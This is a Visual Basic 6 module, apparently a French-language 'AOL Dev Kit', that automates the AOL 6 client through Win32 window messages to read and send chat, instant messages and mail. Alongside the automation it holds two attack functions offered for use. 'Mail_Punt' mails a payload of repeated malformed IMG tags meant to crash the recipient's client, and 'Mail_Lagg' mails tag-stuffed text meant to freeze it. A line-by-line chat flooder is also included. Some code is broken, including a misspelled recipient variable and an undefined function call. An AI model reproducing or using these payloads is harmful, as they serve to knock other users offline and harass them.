Attribute VB_Name = "Module_Principal"
'#_Aol Dev Kit_#
'-------------------Fonctions principales----------------
'-------------------
'-------------------
'-------------------
'#
'''''''''''''bY eXodEuS
'#####
'#####
'#####

'''''''''''''''''''''''''''''''''''
'Declarations - constantes - types'
'''''''''''''''''''''''''''''''''''
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hWnd As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Public Declare Function SendMessageByNum& Lib "user32" Alias "SendMessageA" (ByVal hWnd&, ByVal wMsg&, ByVal wParam&, ByVal lParam&)
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function GetWindowRect Lib "user32" (ByVal hWnd As Long, lpRect As RECT) As Long
Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Public Declare Function SetCursorPos Lib "user32" (ByVal X As Long, ByVal Y As Long) As Long
    
Public Const WM_SETTEXT = &HC
Public Const WM_CHAR = &H102
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_CLOSE = &H10
Public Const WM_gettext = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const VK_RETURN = &HD
Public Const VK_SPACE = &H20

Public Type POINTAPI
        X As Long
        Y As Long
End Type
Type RECT
   Left As Long
   Top As Long
   Right As Long
   Bottom As Long
End Type









Public Function Cherche_Aol()
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''
'Recupere la valeur hwnd de la fenetre aol'
'''''''''''''''''''''''''''''''''''''''''''
Cherche_Aol = FindWindow("AOL Frame25", vbNullString)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Cherche_Fenetre_Bienvenue()
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''''''''
'Recupere la valeur hwnd de la fentre de bienvenue'
'''''''''''''''''''''''''''''''''''''''''''''''''''
FindMDI = FindWindowEx((FindWindow("AOL Frame25", vbNullString)), 0&, "MDIClient", vbNullString)
Cherche_Fenetre_Bienvenue = FindWindowEx(FindMDI, 0&, "AOL Child", vbNullString)
Exit Function
erreur:
Call Merdum: Exit Function
End Function



Public Function Pseudo_Aol() As String
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Recuper le pseudo de l'utilisateur                             '
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Dim win As Long
Dim cap, sn As String
win& = Cherche_Fenetre_Bienvenue
Do
DoEvents
cap = GetCaption(win&)
If InStr(cap, "Bienvenue, ") <> "0" Then
   Pseudo_Aol = Mid(cap, InStr(cap, ",") + 2, InStr(cap, "!") - (InStr(cap, ",") + 2))
   Exit Function
   Else: GoTo fin
End If
Loop Until win = 0&
fin:
Pseudo_Aol = "Non Connect"
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function GetCaption(WindowHandle As Long) As String
On Error GoTo erreur
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Recupere la caption d'une fenetre a partir d'une valeur hwnd'
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Dim Buffer As String, TextLength As Long
TextLength& = GetWindowTextLength(WindowHandle&)
Buffer$ = String(TextLength&, 0&)
Call GetWindowText(WindowHandle&, Buffer$, TextLength& + 1)
GetCaption$ = Buffer$
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Cherche_Textbox_Mot_Clef()
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''''
'Recupere la valeur hwnd de la textbox keyword'
'''''''''''''''''''''''''''''''''''''''''''''''
Combo = FindWindowEx(tool, 0&, "_AOL_Combobox", vbNullString)
edit& = FindWindowEx(Combo, 0&, "Edit", vbNullString)
Cherche_Textbox_Mot_Clef = edit&
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Mot_Clef(Le_Texte As String)
On Error GoTo erreur
''''''''''''''''''''''
'Execute un mot clef '
''''''''''''''''''''''
Dim tool, Combo, txtbx, icon As Long
tool = Barre_Outils
Combo = FindWindowEx(tool, 0&, "_AOL_Combobox", vbNullString)
txtbx = FindWindowEx(Combo, 0&, "Edit", vbNullString)
Call SendMessageByString(txtbx, WM_SETTEXT, 0&, Le_Texte)
Call SendMessageLong(txtbx, WM_CHAR, VK_SPACE, 0&)
Call SendMessageLong(txtbx, WM_CHAR, VK_RETURN, 0&)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Envoyer_En_Salon(Le_Texte As String)
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Envoi le texte en salon sans toucher au  texte deja present dans la ""textbox""'
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

    Dim TexteAvant As String
    aolframe& = FindWindow("aol frame25", vbNullString)
mdiclient& = FindWindowEx(aolframe&, 0&, "mdiclient", vbNullString)
aolchild& = FindWindowEx(mdiclient&, 0&, "aol child", vbNullString)
richcntl& = FindWindowEx(aolchild&, 0&, "richcntl", vbNullString)
richcntl& = FindWindowEx(aolchild&, richcntl&, "richcntl", vbNullString)
    TexteAvant = GetText(richcntl&)
    Call SendMessageByString(richcntl&, WM_SETTEXT, 0&, "")
    Call SendMessageByString(richcntl&, WM_SETTEXT, 0&, Le_Texte)
    Do: DoEvents
        Call SendMessageLong(richcntl&, WM_CHAR, VK_RETURN, 0&)
        If GetText(richcntl&) = "" Then Exit Do
    Loop
    Call SendMessageByString(richcntl&, WM_SETTEXT, 0&, TexteAvant)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function GetText(WindowHandle As Long) As String
    Dim Buffer As String, TextLength As Long
    TextLength& = SendMessage(WindowHandle&, WM_GETTEXTLENGTH, 0&, 0&)
    Buffer$ = String(TextLength&, 0&)
    Call SendMessageByString(WindowHandle&, WM_gettext, TextLength& + 1, Buffer$)
     GetText$ = Buffer$
      End Function

Public Function Online() As String
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''
'Verifie si l'utilisateur est connecte a aol'
'Retourne oui ou non'''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''
Dim check$
check$ = Pseudo_Aol
If check$ = "Non Connect" Then Online = "non": Exit Function
Online = "oui"
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Nom_Du_Salon()
On Error GoTo erreur
''''''''''''''''''''''''''
'Retourne le nom du salon'
''''''''''''''''''''''''''
Dim HwndSalon&
aolframe& = FindWindow("aol frame25", vbNullString)
mdiclient& = FindWindowEx(aolframe&, 0&, "mdiclient", vbNullString)
aolchild& = FindWindowEx(mdiclient&, 0&, "aol child", vbNullString)
HwndSalon& = aolchild&
If HwndSalon& = "0" Then Nom_Du_Salon = "": Exit Function
Nom_Du_Salon = GetCaption(HwndSalon&)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Fermer_une_fenetre(hWnd As Long)
On Error GoTo erreur
''''''''''''''''''''''''''''''''''''''''''''''
'Ferme une fenetre a partir d'une valeur hwnd'
''''''''''''''''''''''''''''''''''''''''''''''
If hWnd& = 0& Then Exit Function
Call PostMessage(hWnd&, WM_CLOSE, 0&, 0&)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Merdum()
''''''''''''''''''''''''''''
'Pseudo gestion des erreurs'
''''''''''''''''''''''''''''
MsgBox " --- .::.:ERREUR:.::. ---", vbCritical, "...-=Merdum=-..."
End Function

Public Function Salon_Prive(Salon As String)
On Error GoTo erreur
'''''''''''''''''''''''''''''''''
'Pour entrer dans un salon prive'
'''''''''''''''''''''''''''''''''
If Salon$ = "" Then Exit Function
Call Mot_Clef("aol://2719:2-2-" & Salon$)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Cherche_Btn_Lire_Courrier()
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''
'Cherche la valeur hwnd du btn lire courrier'
'''''''''''''''''''''''''''''''''''''''''''''
aolframe& = FindWindow("aol frame25", vbNullString)
aoltoolbar& = FindWindowEx(aolframe&, 0&, "aol toolbar", vbNullString)
aoltoolbar& = FindWindowEx(aoltoolbar&, 0&, "_aol_toolbar", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, 0&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
Cherche_Btn_Lire_Courrier = aolicon&
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Lire_Nouveau_Courrier()
'''''''''''''''''''''''''''''''''''
'Click sur le btn lire le courrier'
'''''''''''''''''''''''''''''''''''
On Error GoTo erreur
Call Cliquer(Cherche_Btn_Lire_Courrier)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Detecter_Salon() As String
On Error GoTo error
''''''''''''''''''''''''''''''''''''''''''''''''''''
'Retourne oui ou non suivant la presence d'un salon'
''''''''''''''''''''''''''''''''''''''''''''''''''''
If Nom_Du_Salon <> "" Then
GoTo test
Else
non:
Detecter_Salon = "non"
End If
Exit Function
test:
If InStr(Nom_Du_Salon, "Bienvenue") Then
GoTo non
Else
Detecter_Salon = "oui"
End If
Exit Function
error:
Call Merdum: Exit Function
End Function

Public Function Barre_Outils() As Long
''''''''''''''''''''''''''''''''''''''''''''''
'Recupere la valeur hwnd de la barre d'outils'
''''''''''''''''''''''''''''''''''''''''''''''
On Error GoTo erreur
Dim tool As Long
tool = FindWindowEx(Cherche_Aol, 0&, "AOL Toolbar", vbNullString)
Barre_Outils = FindWindowEx(tool, 0&, "_AOL_Toolbar", vbNullString)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Envoyer_courrier(Destinataire As String, Cc As String, Sujet As String, message As String)
On Error GoTo erreur
''''''''''''''''''''
'Envoie un courrier'
''''''''''''''''''''
Mot_Clef ("mailto:" & Destinataire$)
Timeout 1
m1 = FindWindowEx(Cherche_Aol, 0&, "MDIClient", vbNullString)
Mail = FindWindowEx(m1, 0&, "AOL Child", "Ecrire un e-mail")
txtbx = FindWindowEx(Mail, 0&, "_AOL_Edit", vbNullString)
txtbx = FindWindowEx(Mail, txtbx, "_AOL_Edit", vbNullString)
Call SendMessageByString(txtbx, WM_SETTEXT, 0&, Cc)
txtbx = FindWindowEx(Mail, txtbx, "_AOL_Edit", vbNullString)
Call SendMessageByString(txtbx, WM_SETTEXT, 0&, Sujet)
txtbx = FindWindowEx(Mail, txtbx, "RICHCNTL", vbNullString)
Call SendMessageByString(txtbx, WM_SETTEXT, 0&, message)
icon = FindWindowEx(Mail, txtbx, "_AOL_Icon", vbNullString)
For i = 1 To 3
DoEvents
icon = FindWindowEx(Mail, icon, "_AOL_Icon", vbNullString)
Next i
MsgBox icon
Call Cliquer(icon)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Sub Cliquer(ByVal hWnd As Long)
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''''
'Click sur un objet a partir de sa valeur hwnd'
'''''''''''''''''''''''''''''''''''''''''''''''
Dim Size As RECT
Dim CurPos As POINTAPI
Call GetWindowRect(hWnd, Size)
Call GetCursorPos(CurPos)
Call SetCursorPos(Size.Left + (Size.Right - Size.Left) / 2, Size.Top + (Size.Bottom - Size.Top) / 2)
Call SendMessageByNum(hWnd, WM_LBUTTONDOWN, 0, 0)
Call SendMessageByNum(hWnd, WM_LBUTTONUP, 0, 0)
Call SetCursorPos(CurPos.X, CurPos.Y)
Exit Sub
erreur:
Call Merdum: Exit Sub
End Sub

Public Function Envoyer_Im(Pseudo As String, message As String)
On Error GoTo erreur
'''''''''''''''''''''''''''
'Envoie un messsage eclair'
'''''''''''''''''''''''''''
Call Mot_Clef("im")
Timeout 1
IMs = Chercher_Ims
TextB0x = FindWindowEx(IMs, 0&, "_AOL_Edit", vbNullString)
Call SendMessageByString(TextB0x, WM_SETTEXT, 0&, Pseudo$)
TextB0x = FindWindowEx(IMs, 0&, "RICHCNTL", vbNullString)
Call SendMessageByString(TextB0x, WM_SETTEXT, 0&, message$)
icone = FindWindowEx(IMs, TextB0x, "_AOL_Icon", vbNullString)
Call Cliquer(icone)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Chercher_Ims() As Long
'''''''''''''''''''''''''''''''''''''''''''''''
'Recupere la valeur hwnd de la fenetre des ims'
'''''''''''''''''''''''''''''''''''''''''''''''
Dim m1&
Dim m2&
Dim icon&
Dim Caption$
m1& = FindWindowEx(Cherche_Aol, 0&, "MDIClient", vbNullString)
m2& = 0&
Do
DoEvents
m2& = FindWindowEx(m1&, m2&, "AOL Child", vbNullString)
Caption = GetCaption(m2)
If InStr(Caption, "Message clair") Then
Chercher_Ims = m2
Exit Function
End If
Loop Until m2 = 0&
End Function

Public Function Fermer_Salon()
'''''''''''''''''''''''''''
'Ferme la fenetre du salon'
'''''''''''''''''''''''''''
On Error GoTo erreur
If Detecter_Salon = "oui" Then
aolframe& = FindWindow("aol frame25", vbNullString)
mdiclient& = FindWindowEx(aolframe&, 0&, "mdiclient", vbNullString)
aolchild& = FindWindowEx(mdiclient&, 0&, "aol child", vbNullString)
Call Fermer_une_fenetre(aolchild&)
Exit Function
Else
Exit Function
End If
erreur:
Call Merdum: Exit Function
End Function

Public Function Mail_Punt(Destinataire As String, Cc As String, Sujet As String)
On Error GoTo erreur:
'''''''''''''''''''''''
'Envoie un "mail punt"'
'''''''''''''''''''''''
Dim message$
For m = 0 To 399
message$ = message & "<IMG  SRC=Tiles.exe ID=999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 WIDTH=1 HEIGHT=1 BORDER=0 DATASIZE=1000><IMG  SRC=Tiles.exe ID=0 WIDTH=1 HEIGHT=1 BORDER=0 DATASIZE=1000>"
Next m
Call Envoyer_courrier(destiantaire$, Cc$, Sujet$, message$)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Mail_Lagg(Destinataire As String, Cc As String, Sujet As String)
On Error GoTo erreur
'''''''''''''''''''''''
'Envoie un "mail lagg"'
'''''''''''''''''''''''
Dim themessage$
For z = 0 To 100
themessage$ = themessage$ & "L<HTML></HTML><HTML></HTML><HTML></HTML>A<HTML></HTML><HTML></HTML><HTML></HTML>A<HTML></HTML><HTML></HTML><HTML></HTML>A<HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML> <HTML></HTML><HTML></HTML><HTML></HTML> <HTML></HTML><HTML></HTML><HTML></HTML> <HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML>G<HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML><HTML></HTML>"
Next z
Call Envoyer_courrier(Destinataire$, Cc$, Sujet$, themessage$)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Scroller_Textbox_Salon(The_text As TextBox)
On Error GoTo erreur
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'envoie ligne par ligne le contenu d'une textbox en salon'
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
meeh$ = The_text.Text
z = 0
Do
z = z + 1
newz = InStr(z, meeh$, Chr(13))
If newz = 0 Then
Module$ = Mid$(meeh$, z)
Call Envoyer_En_Salon(Module$)
Pause 1
Exit Function
End If
F = newz - z
leet$ = Mid$(meeh$, z, F)
If newz <> 0 Then: Envoyer_En_Salon (leet$)
Pause 1
z = newz + 1
Loop
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Fermer_Aol()
'''''''''''
'Ferme Aol'
'''''''''''
On Error GoTo erreur
If chercher_aol <> "0" Then
Call Fermer_une_fenetre(Cherche_Aol)
Exit Function
End If
erreur:
Call Merdum: Exit Function
End Function

Public Function Lancer_Aol6()
'''''''''''''''''''''''''''''''''''''''''''''''
'Execute aol 6 dans son repertoire par default'
'''''''''''''''''''''''''''''''''''''''''''''''
On Error GoTo erreur
If Online = "non" Then
Shell "C:\AOL 6.0\aol.exe", vbNormalFocus
End If
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Chaines()
On Error GoTo erreur
'''''''''''''''''''''''''''''''''
'Affiche / Cache les chaines aol'
'''''''''''''''''''''''''''''''''
aolframe& = FindWindow("aol frame25", vbNullString)
aoltoolbar& = FindWindowEx(aolframe&, 0&, "aol toolbar", vbNullString)
aoltoolbar& = FindWindowEx(aoltoolbar&, 0&, "_aol_toolbar", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, 0&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
aolicon& = FindWindowEx(aoltoolbar&, aolicon&, "_aol_icon", vbNullString)
Call Cliquer(aolicon&)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Function Derniere_Ligne_Salon() As String
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Recupere la derniere ligne de texte du salon sans le pseudo'
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
TheStr = Derniere_Ligne_Salon_Pseudo
For T = Len(TheStr) To 1 Step -1
If Mid(TheStr, T, 1) = ":" Then Exit For Else totalstr = Mid(TheStr, T, 1) & totalstr
Next
Derniere_Ligne_Salon = Mid(totalstr, 3, Len(totalstr))
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Function Texte_Du_Salon() As String
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''
'Recupere le texte present dans le salon'
'''''''''''''''''''''''''''''''''''''''''
Dim chatroom&
aolframe& = FindWindow("aol frame25", vbNullString)
mdiclient& = FindWindowEx(aolframe&, 0&, "mdiclient", vbNullString)
aolchild& = FindWindowEx(mdiclient&, 0&, "aol child", vbNullString)
richcntl& = FindWindowEx(aolchild&, 0&, "richcntl", vbNullString)
chatroom& = richcntl&
Texte_Du_Salon = GetText(chatroom&)
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Derniere_Ligne_Salon_Pseudo() As String
On Error GoTo erreur
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Recupere la derniere ligne de texte du salon avec le pseudo'
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
TheStr = Texte_Du_Salon
For T = Len(TheStr) To 1 Step -1
If Mid(TheStr, T, 1) = Chr(13) Then Exit For Else totalstr = Mid(TheStr, T, 1) & totalstr
Next
Derniere_Ligne_Salon_Pseudo = totalstr
Exit Function
erreur:
Call Merdum: Exit Function
End Function

Public Function Dernier_Pseudo_Salon(min As Boolean) As String
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'Recupere le pseudo de la derniere personne ki a cause dans le salon'
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
On Error GoTo erreur
TheStr = Derniere_Ligne_Salon_Pseudo
For T = 1 To Len(TheStr)
If Mid(TheStr, T, 1) = ":" Then Exit For Else totalstr = totalstr & Mid(TheStr, T, 1)
Next
If min = True Then
Dernier_Pseudo_Salon = LCase(totalstr)
Else
Dernier_Pseudo_Salon = (totalstr)
End If
Exit Function
erreur:
Call Merdum: Exit Function
End Function
